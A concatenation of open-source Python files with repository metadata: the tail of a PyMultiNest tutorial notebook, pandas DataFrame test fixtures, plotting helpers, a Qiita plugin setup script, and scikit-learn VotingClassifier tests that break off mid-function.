for k,mode in enumerate(p.analyser.get_stats()['modes']):
print('mode' + str(k) + '\t', np.round(mode['mean'],3),'\t', np.round(mode['local log-evidence'],3))
print('True a\t', [param0a, param1a])
print('True b\t', [param0b, param1b])
# In[ ]:
modelAll = np.zeros((nPts, nPts))
fig=figure(figsize=(20,10))
for km,mode in enumerate(p.analyser.get_stats()['modes']):
modelAll = modelAll + model(mode['mean'])(ydata,xdata)
ax = fig.add_subplot(1,len(p.analyser.get_stats()['modes']), km+1)
ims = ax.imshow(model(mode['mean'])(ydata,xdata))
plt.colorbar(ims)
fig = figure(figsize=(20,10))
ax = fig.add_subplot(131)
ims = ax.imshow(modelAll)
plt.colorbar(ims)
ax = fig.add_subplot(132)
ims = ax.imshow(model(p.analyser.get_best_fit()['parameters'])(ydata,xdata))
plt.colorbar(ims)
ax = fig.add_subplot(133)
ims = ax.imshow(zdata)
plt.colorbar(ims)
# Residuals
modelAll = np.zeros((nPts, nPts))
for km,mode in enumerate(p.analyser.get_stats()['modes']):
if np.round(mode['local log-evidence'],3) > -400000.:
modelAll = modelAll + model(mode['mean'])(ydata,xdata)
fig = figure(figsize=(20,10))
ax = fig.add_subplot(131)
ims = ax.imshow(zdata - modelAll)
plt.colorbar(ims)
ax = fig.add_subplot(132)
ax.hist((zdata - modelAll).ravel(), bins=1000, normed=True);
# plt.colorbar(ims)
# In[ ]:
p.analyser.get_stats()
p.analyser.post_file
# # PyMultiNest Learning Tutorial
#
# CCT = Charge Carrier Trapping - This is a test of comparing the Zhou et al 2017 results with a data driven analysis using multinest
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pandas import read_csv
# In[ ]:
import os
if not os.path.exists('chains/'):
os.mkdir('chains')
print(os.path.exists('chains'))
# # PyMultiNest Solver Class
# **Initial Example**
# In[ ]:
#!/usr/bin/env python
from pymultinest.solve import Solver
from numpy import pi, sin
class EggboxProblem(Solver):
def Prior(self, cube):
return cube * 10 * pi
def LogLikelihood(self, cube):
chi = (sin(cube)).prod()
return (2. + chi)**5
solution = EggboxProblem(n_dims = 1)
print(solution)
solution = EggboxProblem(n_dims = 2)
print(solution)
# **My PyMultiNest Test**
# In[ ]:
get_ipython().magic('matplotlib inline')
from pylab import *;ion()
from pymultinest.solve import Solver,solve
from numpy import pi, sin, cos, linspace
def straight_line(cube):
offset = cube[0]
slope = cube[1]
return lambda abscissa: offset + slope * abscissa
def sine_wave(cube):
amp = cube[0]
period = cube[1]
return lambda abscissa: amp*sin(2*pi / period * abscissa)
np.random.seed(0)
param0= 0.1#0.05
param1= 0.1#5*pi
yunc = 0.025
nPts = int(10)
nThPts= int(1e3)
xmin = -0.5*pi
xmax = 0.5*pi
dx = 0.1*(xmax - xmin)
# model = sine_wave
model = straight_line
yuncs = np.random.normal(yunc, 1e-2 * yunc, nPts)
thdata= np.linspace(xmin-dx, xmax+dx, nThPts)
xdata = np.random.uniform(xmin, xmax, nPts)
xdata = sort(xdata)
ydata = model([param0,param1])(xdata)
yerr = np.random.normal(0, yuncs, nPts)
zdata = ydata + yerr
figure(figsize=(20,5))
plot(thdata, model([param0, param1])(thdata))
errorbar(xdata, zdata, yuncs, fmt='o')
# In[ ]:
class ChisqFit(Solver):
def Prior(self, cube):
return cube
def LogLikelihood(self, cube):
chisq = (-0.5*((model(cube)(xdata) - ydata)**2.) )#/ yuncs**2.
return chisq.prod()
# solution = ChisqFit(n_dims = 2, resume=False, outputfiles_basename='./42-')
solution = ChisqFit(n_dims = 2, n_params=None, n_clustering_params=None, wrapped_params=None , importance_nested_sampling=True, multimodal=True, const_efficiency_mode=False , n_live_points=400, evidence_tolerance=0.5, sampling_efficiency=0.8 , n_iter_before_update=100, null_log_evidence=-1e+90, max_modes=100 , mode_tolerance=-1e+90, outputfiles_basename='chains/1-', seed=-1, verbose=False , resume=False, context=0, write_output=True, log_zero=-1e+100, max_iter=0 , init_MPI=False, dump_callback=None)
print(solution)
# **Simplest Example**
# In[ ]:
if not os.path.exists("chains"): os.mkdir("chains")
import pymultinest
def prior(cube, ndim, nparams):
cube[0] = cube[0] * 2
def loglikelihood(cube, ndim, nparams):
return ((cube[0] - 0.2) / 0.1)**2
pymultinest.run(loglikelihood, prior, n_dims=1, max_iter=2)
# # PyMultiNest Solve Function
# In[ ]:
#!/usr/bin/env python
from __future__ import absolute_import, unicode_literals, print_function
import numpy
from numpy import pi, cos
from pymultinest.solve import solve
import os
if not os.path.exists("chains"): os.mkdir("chains")
# probability function, taken from the eggbox problem.
def myprior(cube):
return cube * 10 * pi
def myloglike(cube):
chi = (cos(cube / 2.)).prod()
return (2. + chi)**5
# In[ ]:
# number of dimensions our problem has
parameters = ["x", "y"]
n_params = len(parameters)
# run MultiNest
result = solve(LogLikelihood=myloglike, Prior=myprior,
n_dims=n_params, outputfiles_basename="chains/3-")
print()
print('evidence: %(logZ).1f +- %(logZerr).1f' % result)
print()
print('parameter values:')
for name, col in zip(parameters, result['samples'].transpose()):
print('%15s : %.3f +- %.3f' % (name, col.mean(), col.std()))
| gpl-3.0 |
toobaz/pandas | pandas/tests/frame/conftest.py | 2 | 10626 | import numpy as np
import pytest
from pandas import DataFrame, NaT, date_range
import pandas.util.testing as tm
@pytest.fixture
def float_frame_with_na():
"""
Fixture for DataFrame of floats with index of unique strings
Columns are ['A', 'B', 'C', 'D']; some entries are missing
A B C D
ABwBzA0ljw -1.128865 -0.897161 0.046603 0.274997
DJiRzmbyQF 0.728869 0.233502 0.722431 -0.890872
neMgPD5UBF 0.486072 -1.027393 -0.031553 1.449522
0yWA4n8VeX -1.937191 -1.142531 0.805215 -0.462018
3slYUbbqU1 0.153260 1.164691 1.489795 -0.545826
soujjZ0A08 NaN NaN NaN NaN
7W6NLGsjB9 NaN NaN NaN NaN
... ... ... ... ...
uhfeaNkCR1 -0.231210 -0.340472 0.244717 -0.901590
n6p7GYuBIV -0.419052 1.922721 -0.125361 -0.727717
ZhzAeY6p1y 1.234374 -1.425359 -0.827038 -0.633189
uWdPsORyUh 0.046738 -0.980445 -1.102965 0.605503
3DJA6aN590 -0.091018 -1.684734 -1.100900 0.215947
2GBPAzdbMk -2.883405 -1.021071 1.209877 1.633083
sHadBoyVHw -2.223032 -0.326384 0.258931 0.245517
[30 rows x 4 columns]
"""
df = DataFrame(tm.getSeriesData())
# set some NAs
df.loc[5:10] = np.nan
df.loc[15:20, -2:] = np.nan
return df
@pytest.fixture
def bool_frame_with_na():
"""
Fixture for DataFrame of booleans with index of unique strings
Columns are ['A', 'B', 'C', 'D']; some entries are missing
A B C D
zBZxY2IDGd False False False False
IhBWBMWllt False True True True
ctjdvZSR6R True False True True
AVTujptmxb False True False True
G9lrImrSWq False False False True
sFFwdIUfz2 NaN NaN NaN NaN
s15ptEJnRb NaN NaN NaN NaN
... ... ... ... ...
UW41KkDyZ4 True True False False
l9l6XkOdqV True False False False
X2MeZfzDYA False True False False
xWkIKU7vfX False True False True
QOhL6VmpGU False False False True
22PwkRJdat False True False False
kfboQ3VeIK True False True False
[30 rows x 4 columns]
"""
df = DataFrame(tm.getSeriesData()) > 0
df = df.astype(object)
# set some NAs
df.loc[5:10] = np.nan
df.loc[15:20, -2:] = np.nan
return df
@pytest.fixture
def int_frame():
"""
Fixture for DataFrame of ints with index of unique strings
Columns are ['A', 'B', 'C', 'D']
A B C D
vpBeWjM651 1 0 1 0
5JyxmrP1En -1 0 0 0
qEDaoD49U2 -1 1 0 0
m66TkTfsFe 0 0 0 0
EHPaNzEUFm -1 0 -1 0
fpRJCevQhi 2 0 0 0
OlQvnmfi3Q 0 0 -2 0
... .. .. .. ..
uB1FPlz4uP 0 0 0 1
EcSe6yNzCU 0 0 -1 0
L50VudaiI8 -1 1 -2 0
y3bpw4nwIp 0 -1 0 0
H0RdLLwrCT 1 1 0 0
rY82K0vMwm 0 0 0 0
1OPIUjnkjk 2 0 0 0
[30 rows x 4 columns]
"""
df = DataFrame({k: v.astype(int) for k, v in tm.getSeriesData().items()})
# force these all to int64 to avoid platform testing issues
return DataFrame({c: s for c, s in df.items()}, dtype=np.int64)
@pytest.fixture
def datetime_frame():
"""
Fixture for DataFrame of floats with DatetimeIndex
Columns are ['A', 'B', 'C', 'D']
A B C D
2000-01-03 -1.122153 0.468535 0.122226 1.693711
2000-01-04 0.189378 0.486100 0.007864 -1.216052
2000-01-05 0.041401 -0.835752 -0.035279 -0.414357
2000-01-06 0.430050 0.894352 0.090719 0.036939
2000-01-07 -0.620982 -0.668211 -0.706153 1.466335
2000-01-10 -0.752633 0.328434 -0.815325 0.699674
2000-01-11 -2.236969 0.615737 -0.829076 -1.196106
... ... ... ... ...
2000-02-03 1.642618 -0.579288 0.046005 1.385249
2000-02-04 -0.544873 -1.160962 -0.284071 -1.418351
2000-02-07 -2.656149 -0.601387 1.410148 0.444150
2000-02-08 -1.201881 -1.289040 0.772992 -1.445300
2000-02-09 1.377373 0.398619 1.008453 -0.928207
2000-02-10 0.473194 -0.636677 0.984058 0.511519
2000-02-11 -0.965556 0.408313 -1.312844 -0.381948
[30 rows x 4 columns]
"""
return DataFrame(tm.getTimeSeriesData())
@pytest.fixture
def float_string_frame():
"""
Fixture for DataFrame of floats and strings with index of unique strings
Columns are ['A', 'B', 'C', 'D', 'foo'].
A B C D foo
w3orJvq07g -1.594062 -1.084273 -1.252457 0.356460 bar
PeukuVdmz2 0.109855 -0.955086 -0.809485 0.409747 bar
ahp2KvwiM8 -1.533729 -0.142519 -0.154666 1.302623 bar
3WSJ7BUCGd 2.484964 0.213829 0.034778 -2.327831 bar
khdAmufk0U -0.193480 -0.743518 -0.077987 0.153646 bar
LE2DZiFlrE -0.193566 -1.343194 -0.107321 0.959978 bar
HJXSJhVn7b 0.142590 1.257603 -0.659409 -0.223844 bar
... ... ... ... ... ...
9a1Vypttgw -1.316394 1.601354 0.173596 1.213196 bar
h5d1gVFbEy 0.609475 1.106738 -0.155271 0.294630 bar
mK9LsTQG92 1.303613 0.857040 -1.019153 0.369468 bar
oOLksd9gKH 0.558219 -0.134491 -0.289869 -0.951033 bar
9jgoOjKyHg 0.058270 -0.496110 -0.413212 -0.852659 bar
jZLDHclHAO 0.096298 1.267510 0.549206 -0.005235 bar
lR0nxDp1C2 -2.119350 -0.794384 0.544118 0.145849 bar
[30 rows x 5 columns]
"""
df = DataFrame(tm.getSeriesData())
df["foo"] = "bar"
return df
@pytest.fixture
def mixed_float_frame():
"""
Fixture for DataFrame of different float types with index of unique strings
Columns are ['A', 'B', 'C', 'D'].
A B C D
GI7bbDaEZe -0.237908 -0.246225 -0.468506 0.752993
KGp9mFepzA -1.140809 -0.644046 -1.225586 0.801588
VeVYLAb1l2 -1.154013 -1.677615 0.690430 -0.003731
kmPME4WKhO 0.979578 0.998274 -0.776367 0.897607
CPyopdXTiz 0.048119 -0.257174 0.836426 0.111266
0kJZQndAj0 0.274357 -0.281135 -0.344238 0.834541
tqdwQsaHG8 -0.979716 -0.519897 0.582031 0.144710
... ... ... ... ...
7FhZTWILQj -2.906357 1.261039 -0.780273 -0.537237
4pUDPM4eGq -2.042512 -0.464382 -0.382080 1.132612
B8dUgUzwTi -1.506637 -0.364435 1.087891 0.297653
hErlVYjVv9 1.477453 -0.495515 -0.713867 1.438427
1BKN3o7YLs 0.127535 -0.349812 -0.881836 0.489827
9S4Ekn7zga 1.445518 -2.095149 0.031982 0.373204
xN1dNn6OV6 1.425017 -0.983995 -0.363281 -0.224502
[30 rows x 4 columns]
"""
df = DataFrame(tm.getSeriesData())
df.A = df.A.astype("float32")
df.B = df.B.astype("float32")
df.C = df.C.astype("float16")
df.D = df.D.astype("float64")
return df
@pytest.fixture
def mixed_int_frame():
"""
Fixture for DataFrame of different int types with index of unique strings
Columns are ['A', 'B', 'C', 'D'].
A B C D
mUrCZ67juP 0 1 2 2
rw99ACYaKS 0 1 0 0
7QsEcpaaVU 0 1 1 1
xkrimI2pcE 0 1 0 0
dz01SuzoS8 0 1 255 255
ccQkqOHX75 -1 1 0 0
DN0iXaoDLd 0 1 0 0
... .. .. ... ...
Dfb141wAaQ 1 1 254 254
IPD8eQOVu5 0 1 0 0
CcaKulsCmv 0 1 0 0
rIBa8gu7E5 0 1 0 0
RP6peZmh5o 0 1 1 1
NMb9pipQWQ 0 1 0 0
PqgbJEzjib 0 1 3 3
[30 rows x 4 columns]
"""
df = DataFrame({k: v.astype(int) for k, v in tm.getSeriesData().items()})
df.A = df.A.astype("int32")
df.B = np.ones(len(df.B), dtype="uint64")
df.C = df.C.astype("uint8")
df.D = df.C.astype("int64")
return df
@pytest.fixture
def mixed_type_frame():
"""
Fixture for DataFrame of float/int/string columns with RangeIndex
Columns are ['a', 'b', 'c', 'float32', 'int32'].
"""
return DataFrame(
{
"a": 1.0,
"b": 2,
"c": "foo",
"float32": np.array([1.0] * 10, dtype="float32"),
"int32": np.array([1] * 10, dtype="int32"),
},
index=np.arange(10),
)
@pytest.fixture
def timezone_frame():
"""
Fixture for DataFrame of date_range Series with different time zones
Columns are ['A', 'B', 'C']; some entries are missing
A B C
0 2013-01-01 2013-01-01 00:00:00-05:00 2013-01-01 00:00:00+01:00
1 2013-01-02 NaT NaT
2 2013-01-03 2013-01-03 00:00:00-05:00 2013-01-03 00:00:00+01:00
"""
df = DataFrame(
{
"A": date_range("20130101", periods=3),
"B": date_range("20130101", periods=3, tz="US/Eastern"),
"C": date_range("20130101", periods=3, tz="CET"),
}
)
df.iloc[1, 1] = NaT
df.iloc[1, 2] = NaT
return df
@pytest.fixture
def uint64_frame():
"""
Fixture for DataFrame with uint64 values
Columns are ['A', 'B']
"""
return DataFrame(
{"A": np.arange(3), "B": [2 ** 63, 2 ** 63 + 5, 2 ** 63 + 10]}, dtype=np.uint64
)
@pytest.fixture
def simple_frame():
"""
Fixture for simple 3x3 DataFrame
Columns are ['one', 'two', 'three'], index is ['a', 'b', 'c'].
one two three
a 1.0 2.0 3.0
b 4.0 5.0 6.0
c 7.0 8.0 9.0
"""
arr = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0], [7.0, 8.0, 9.0]])
return DataFrame(arr, columns=["one", "two", "three"], index=["a", "b", "c"])
@pytest.fixture
def frame_of_index_cols():
"""
Fixture for DataFrame of columns that can be used for indexing
Columns are ['A', 'B', 'C', 'D', 'E', ('tuple', 'as', 'label')];
'A' & 'B' contain duplicates (but are jointly unique), the rest are unique.
A B C D E (tuple, as, label)
0 foo one a 0.608477 -0.012500 -1.664297
1 foo two b -0.633460 0.249614 -0.364411
2 foo three c 0.615256 2.154968 -0.834666
3 bar one d 0.234246 1.085675 0.718445
4 bar two e 0.533841 -0.005702 -3.533912
"""
df = DataFrame(
{
"A": ["foo", "foo", "foo", "bar", "bar"],
"B": ["one", "two", "three", "one", "two"],
"C": ["a", "b", "c", "d", "e"],
"D": np.random.randn(5),
"E": np.random.randn(5),
("tuple", "as", "label"): np.random.randn(5),
}
)
return df
| bsd-3-clause |
bcaine/maddux | maddux/plot.py | 1 | 1372 | import numpy as np
def plot_sphere_data(position, radius):
"""Given a position and radius, get the data needed to plot.
:param position: Position in (x, y, z) of sphere
:type position: numpy.ndarray
:param radius: radius of sphere
:type radius: int
:returns: (x, y, z) tuple of sphere data to use to create a surface
:rtype: (np.ndarray, np.ndarray, np.ndarray)
"""
u = np.linspace(0, 2 * np.pi, 100)
v = np.linspace(0, np.pi, 100)
x = (radius * np.outer(np.cos(u), np.sin(v)) +
position[0])
y = (radius * np.outer(np.sin(u), np.sin(v)) +
position[1])
z = (radius * np.outer(np.ones(np.size(u)), np.cos(v)) +
position[2])
return (x, y, z)
def plot_sphere(position, radius, ax, color='g', linewidth=0):
"""Plot a sphere.
:param position: Position in (x, y, z) of sphere
:type position: numpy.ndarray
:param radius: radius of sphere
:type radius: int
:param ax: axes to plot on
:type ax: matplotlib.axes
:param color: (Optional) color of sphere
:type color: str
:param linewidth: (Optional) width of ball gridlines
:type linewidth: int
:rtype: matplotlib.axes
"""
x, y, z = plot_sphere_data(position, radius)
return ax.plot_surface(x, y, z, rstride=4, cstride=4,
color=color, linewidth=0)
| mit |
icereval/modular-file-renderer | mfr/ext/tabular/tests/test_panda_tools.py | 2 | 1244 | # -*- coding: utf-8 -*-
import os
from ..libs import panda_tools
HERE = os.path.dirname(os.path.abspath(__file__))
def test_data_from_dateframe():
with open(os.path.join(HERE, 'fixtures', 'test.csv')) as fp:
headers, data = panda_tools.csv_pandas(fp)
assert type(data) == list
assert type(data[0]) == dict
def test_csv_pandas():
with open(os.path.join(HERE, 'fixtures', 'test.csv')) as fp:
headers, data = panda_tools.csv_pandas(fp)
assert headers[0] == {'field': 'one', 'id': 'one', 'name': 'one'}
assert data[0] == {'one': 'à', 'two': 'b', 'three': 'c'}
def test_tsv_pandas():
with open(os.path.join(HERE, 'fixtures', 'test.tsv')) as fp:
headers, data = panda_tools.csv_pandas(fp)
assert headers[0] == {'field': 'one\ttwo\tthree', 'id': 'one\ttwo\tthree', 'name': 'one\ttwo\tthree'}
assert data[0] == {'one\ttwo\tthree': 'a\tb\tc'}
# def test_dta_pandas():
# with open('mfr_tabular/tests/fixtures/test.dta') as fp:
# headers, data = panda_tools.dta_pandas(fp)
# assert headers[0] == {'field': 'one', 'id': 'one', 'name': 'one'}
# assert data[0] == {'one': 'a', 'two': 'b', 'three': 'c'}
# assert len(data) is 2
# assert len(headers) is 3
| apache-2.0 |
lzamparo/SdA_reduce | plot_scripts/plot_sda_2d.py | 1 | 6051 | """
==========
SdA 2d visualizations
==========
This script selects a stratified sample from a validation set and plots it. The input data resides in .h5 files from a given directory
After first grabbing one file and calculating the indices of points to sample, go through and plot those sampled points for each h5 file.
"""
import numpy as np
import matplotlib as mpl
mpl.use('pdf') # needed so that you can plot in a batch job with no X server (undefined $DISPLAY) problems
import matplotlib.pyplot as plt
from matplotlib import offsetbox
from matplotlib.font_manager import FontProperties
import logging
import sys, os, re
import tables
from optparse import OptionParser
from time import time
sys.path.append('/home/lee/projects/SdA_reduce/utils')
from extract_datasets import extract_labeled_chunkrange
np.random.seed(0)
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s')
# parse commandline arguments
op = OptionParser()
op.add_option("--h5dir",
dest="directory", help="Read data input files from this directory.")
op.add_option("--size",
dest="size", type="int", help="Extract the first size chunks of the data set and labels.")
op.add_option("--sample-size",
dest="samplesize", type="int", help="The max size of the samples")
op.add_option("--output",
dest="outputfile", help="Write the plot to this output file.")
(opts, args) = op.parse_args()
def extract_name(filename,regex):
model_name = regex.match(filename)
return model_name.groups()[0]
#----------------------------------------------------------------------
# Scale and visualize the embedding vectors in 2D
def plot_embedding(X, tile, sizes, title=None):
#x_min, x_max = np.min(X, 0), np.max(X, 0)
#X = (X - x_min) / (x_max - x_min)
sub = fig.add_subplot(2, 5, tile)
# Establish the indices for plotting as slices of the X matrix
# Only need the foci upper index, all others can be sliced using the dimensions already stored
wt_samplesize, foci_samplesize, ab_nuclei_samplesize = sizes
foci_upper_index = wt_samplesize + foci_samplesize
sub.plot(X[:wt_samplesize, 0], X[:wt_samplesize, 1], "ro")
sub.plot(X[wt_samplesize:foci_upper_index, 0], X[wt_samplesize:foci_upper_index, 1], "bo")
sub.plot(X[foci_upper_index:, 0], X[foci_upper_index:, 1], "go")
#legend_font_props = FontProperties()
#legend_font_props.set_size('small')
#sub.legend( ('Wild Type', 'Foci', 'Non-round Nuclei'), loc="lower left", numpoints=1,prop=legend_font_props)
if title is not None:
sub.set_title(title,fontsize=17)
return sub
# This becomes a subroutine to extract the data from each h5 file in the directory.
def sample_from(file_name, opts, sampling_tuple=None):
''' Return the sample from the data, the size of each sample, and a tuple containing the rows sampled for each label. '''
datafile = tables.openFile(file_name, mode = "r", title = "Data is stored here")
# Extract some of the dataset from the datafile
X, labels = extract_labeled_chunkrange(datafile, opts.size)
# Sample from the dataset
wt_labels = np.nonzero(labels[:,0] == 0)[0]
foci_labels = np.nonzero(labels[:,0] == 1)[0]
ab_nuclei_labels = np.nonzero(labels[:,0] == 2)[0]
wt_data = X[wt_labels,:]
foci_data = X[foci_labels,:]
ab_nuclei_data = X[ab_nuclei_labels,:]
# Figure out the sample sizes based on the shape of the *_labels arrays and the
# sample size argument
wt_samplesize = min(opts.samplesize,wt_data.shape[0])
foci_samplesize = min(opts.samplesize,foci_data.shape[0])
ab_nuclei_samplesize = min(opts.samplesize, ab_nuclei_data.shape[0])
sizes = (wt_samplesize, foci_samplesize, ab_nuclei_samplesize)
if sampling_tuple is None:
# stratified sampling from each
wt_rows = np.arange(wt_data.shape[0])
foci_rows = np.arange(foci_data.shape[0])
ab_nuclei_rows = np.arange(ab_nuclei_data.shape[0])
np.random.shuffle(wt_rows)
np.random.shuffle(foci_rows)
np.random.shuffle(ab_nuclei_rows)
sampling_tuple = (wt_rows,foci_rows,ab_nuclei_rows)
else:
wt_rows,foci_rows,ab_nuclei_rows = sampling_tuple
wt_data_sample = wt_data[wt_rows[:wt_samplesize],:]
foci_data_sample = foci_data[foci_rows[:foci_samplesize],:]
ab_nuclei_sample = ab_nuclei_data[ab_nuclei_rows[:ab_nuclei_samplesize],:]
D = np.vstack((wt_data_sample,foci_data_sample,ab_nuclei_sample))
datafile.close()
return D, sampling_tuple, sizes
# Read all h5 files
os.chdir(opts.directory)
files = [f for f in os.listdir('.') if f.endswith('.h5')]
name_pattern = re.compile('reduce_SdA\.([\d_]+)\.[\d]+')
sampling_tuple = None
# use the top 10 by homogeneity test ranking
top_10 = [open(filename,'r').readlines() for filename in os.listdir('.') if filename.endswith('homog.txt')]
top_10 = [name.strip() for name in top_10[0]]
top_10_files = [f for f in files if extract_name(f, name_pattern) in top_10]
fig = plt.figure(figsize=(20,10),dpi=100)
for tile,f in enumerate(top_10_files):
data, sampling_tuple, sizes = sample_from(f, opts, sampling_tuple)
model_name = extract_name(f, name_pattern)
if model_name in top_10:
sub = plot_embedding(data, tile, sizes, extract_name(f, name_pattern))
# Put a legend below current axis
legend_font_props = FontProperties()
legend_font_props.set_size('large')
sub.legend( ('Wild Type', 'Foci', 'Non-round Nuclei'), loc="lower left", numpoints=1,prop=legend_font_props, bbox_to_anchor=(-1.85, -0.20),
fancybox=True, shadow=True, ncol=3)
# Put a title on the main figure
#fig.suptitle("2D projections of 10 different SdA models",fontsize=20)
fig.subplots_adjust(hspace=0.25)
# Save the figure
fig.savefig(opts.outputfile,format="pdf", orientation='landscape', pad_inches=0)
| bsd-3-clause |
squirrelo/qiita | qiita_plugins/target_gene/setup.py | 1 | 1827 | #!/usr/bin/env python
# -----------------------------------------------------------------------------
# Copyright (c) 2013, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from setuptools import setup
from glob import glob
__version__ = "0.1.0-dev"
classes = """
Development Status :: 3 - Alpha
License :: OSI Approved :: BSD License
Topic :: Scientific/Engineering :: Bio-Informatics
Topic :: Software Development :: Libraries :: Application Frameworks
Topic :: Software Development :: Libraries :: Python Modules
Programming Language :: Python
Programming Language :: Python :: 2.7
Programming Language :: Python :: Implementation :: CPython
Operating System :: POSIX :: Linux
Operating System :: MacOS :: MacOS X
"""
with open('README.rst') as f:
long_description = f.read()
classifiers = [s.strip() for s in classes.split('\n') if s]
setup(name='qiita-plugin-target-gene',
version=__version__,
long_description=long_description,
license="BSD",
description='Qiita Plugin: Target Gene',
author="Qiita development team",
author_email="qiita.help@gmail.com",
url='https://github.com/biocore/qiita',
test_suite='nose.collector',
packages=['tgp', 'tgp/split_libraries'],
package_data={'tgp': ['support_files/config_file.cfg']},
scripts=glob('scripts/*'),
extras_require={'test': ["nose >= 0.10.1", "pep8", 'httpretty']},
install_requires=['click >= 3.3', 'future', 'requests', 'pandas >= 0.15',
'h5py >= 2.3.1', 'qiime >= 1.9.0, < 1.10.0'],
classifiers=classifiers
)
| bsd-3-clause |
amloewi/css-blockmodels | testing_rpy2.py | 1 | 1545 |
# import numpy as np
# import pandas as pd
#
# # base = library('base') -- import packages from R
# from rpy2.robjects.packages import importr as library
# # R.R('x <- 1') AND R.Array('...') etc -- the core interface
# import rpy2.robjects as R
# # Not clear what this does yet, but allows numpy->R easily?
# import rpy2.robjects.numpy2ri
# # Guess if I want to use formulas, I do really need pandas though --
# # rdf = pd2r.convert_to_r_dataframe(pdf)
# import pandas.rpy.common as pd2r
#
#
# def setup_R():
#
# import numpy as np
# import pandas as pd
#
# # base = library('base') -- import packages from R
# from rpy2.robjects.packages import importr as library
# # R.R('x <- 1') AND R.Array('...') etc -- the core interface
# import rpy2.robjects as R
# # Not clear what this does yet, but allows numpy->R easily?
# import rpy2.robjects.numpy2ri
# # Guess if I want to use formulas, I do really need pandas though --
# # rdf = pd2r.convert_to_r_dataframe(pdf)
# import pandas.rpy.common as pd2r
#
#
#
# def to_rdf(df, name):
# converted = pd2r.convert_to_r_dataframe(df)
# R.globalenv[name] = converted
# return converted
from r import *
if __name__ == '__main__':
base = library('base')
stats = library('stats')
gam = library('gam')
kernlab = library('kernlab')
x = np.random.randn(100)
df = pd.DataFrame({'y':2*x+1, 'x':x})
rdf = dataframe(df, 'rdf')
xgam = R.r("gam(y ~ x, family=gaussian, data=rdf)")
print base.summary(xgam)
| mit |
DSLituiev/scikit-learn | sklearn/ensemble/tests/test_voting_classifier.py | 25 | 8160 | """Testing for the boost module (sklearn.ensemble.boost)."""
import numpy as np
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_raise_message
from sklearn.exceptions import NotFittedError
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import VotingClassifier
from sklearn.model_selection import GridSearchCV
from sklearn import datasets
from sklearn.model_selection import cross_val_score
from sklearn.datasets import make_multilabel_classification
from sklearn.svm import SVC
from sklearn.multiclass import OneVsRestClassifier
# Load the iris dataset and randomly permute it
iris = datasets.load_iris()
X, y = iris.data[:, 1:3], iris.target
def test_estimator_init():
eclf = VotingClassifier(estimators=[])
msg = ('Invalid `estimators` attribute, `estimators` should be'
' a list of (string, estimator) tuples')
assert_raise_message(AttributeError, msg, eclf.fit, X, y)
clf = LogisticRegression(random_state=1)
eclf = VotingClassifier(estimators=[('lr', clf)], voting='error')
msg = ('Voting must be \'soft\' or \'hard\'; got (voting=\'error\')')
assert_raise_message(ValueError, msg, eclf.fit, X, y)
eclf = VotingClassifier(estimators=[('lr', clf)], weights=[1, 2])
msg = ('Number of classifiers and weights must be equal'
'; got 2 weights, 1 estimators')
assert_raise_message(ValueError, msg, eclf.fit, X, y)
def test_predictproba_hardvoting():
eclf = VotingClassifier(estimators=[('lr1', LogisticRegression()),
('lr2', LogisticRegression())],
voting='hard')
msg = "predict_proba is not available when voting='hard'"
assert_raise_message(AttributeError, msg, eclf.predict_proba, X)
def test_notfitted():
eclf = VotingClassifier(estimators=[('lr1', LogisticRegression()),
('lr2', LogisticRegression())],
voting='soft')
msg = ("This VotingClassifier instance is not fitted yet. Call \'fit\'"
" with appropriate arguments before using this method.")
assert_raise_message(NotFittedError, msg, eclf.predict_proba, X)
def test_majority_label_iris():
"""Check classification by majority label on dataset iris."""
clf1 = LogisticRegression(random_state=123)
clf2 = RandomForestClassifier(random_state=123)
clf3 = GaussianNB()
eclf = VotingClassifier(estimators=[
('lr', clf1), ('rf', clf2), ('gnb', clf3)],
voting='hard')
scores = cross_val_score(eclf, X, y, cv=5, scoring='accuracy')
assert_almost_equal(scores.mean(), 0.95, decimal=2)
def test_tie_situation():
"""Check voting classifier selects smaller class label in tie situation."""
clf1 = LogisticRegression(random_state=123)
clf2 = RandomForestClassifier(random_state=123)
eclf = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2)],
voting='hard')
assert_equal(clf1.fit(X, y).predict(X)[73], 2)
assert_equal(clf2.fit(X, y).predict(X)[73], 1)
assert_equal(eclf.fit(X, y).predict(X)[73], 1)
def test_weights_iris():
"""Check classification by average probabilities on dataset iris."""
clf1 = LogisticRegression(random_state=123)
clf2 = RandomForestClassifier(random_state=123)
clf3 = GaussianNB()
eclf = VotingClassifier(estimators=[
('lr', clf1), ('rf', clf2), ('gnb', clf3)],
voting='soft',
weights=[1, 2, 10])
scores = cross_val_score(eclf, X, y, cv=5, scoring='accuracy')
assert_almost_equal(scores.mean(), 0.93, decimal=2)
def test_predict_on_toy_problem():
"""Manually check predicted class labels for toy dataset."""
clf1 = LogisticRegression(random_state=123)
clf2 = RandomForestClassifier(random_state=123)
clf3 = GaussianNB()
X = np.array([[-1.1, -1.5],
[-1.2, -1.4],
[-3.4, -2.2],
[1.1, 1.2],
[2.1, 1.4],
[3.1, 2.3]])
y = np.array([1, 1, 1, 2, 2, 2])
assert_equal(all(clf1.fit(X, y).predict(X)), all([1, 1, 1, 2, 2, 2]))
assert_equal(all(clf2.fit(X, y).predict(X)), all([1, 1, 1, 2, 2, 2]))
assert_equal(all(clf3.fit(X, y).predict(X)), all([1, 1, 1, 2, 2, 2]))
eclf = VotingClassifier(estimators=[
('lr', clf1), ('rf', clf2), ('gnb', clf3)],
voting='hard',
weights=[1, 1, 1])
assert_equal(all(eclf.fit(X, y).predict(X)), all([1, 1, 1, 2, 2, 2]))
eclf = VotingClassifier(estimators=[
('lr', clf1), ('rf', clf2), ('gnb', clf3)],
voting='soft',
weights=[1, 1, 1])
assert_equal(all(eclf.fit(X, y).predict(X)), all([1, 1, 1, 2, 2, 2]))
def test_predict_proba_on_toy_problem():
"""Calculate predicted probabilities on toy dataset."""
clf1 = LogisticRegression(random_state=123)
clf2 = RandomForestClassifier(random_state=123)
clf3 = GaussianNB()
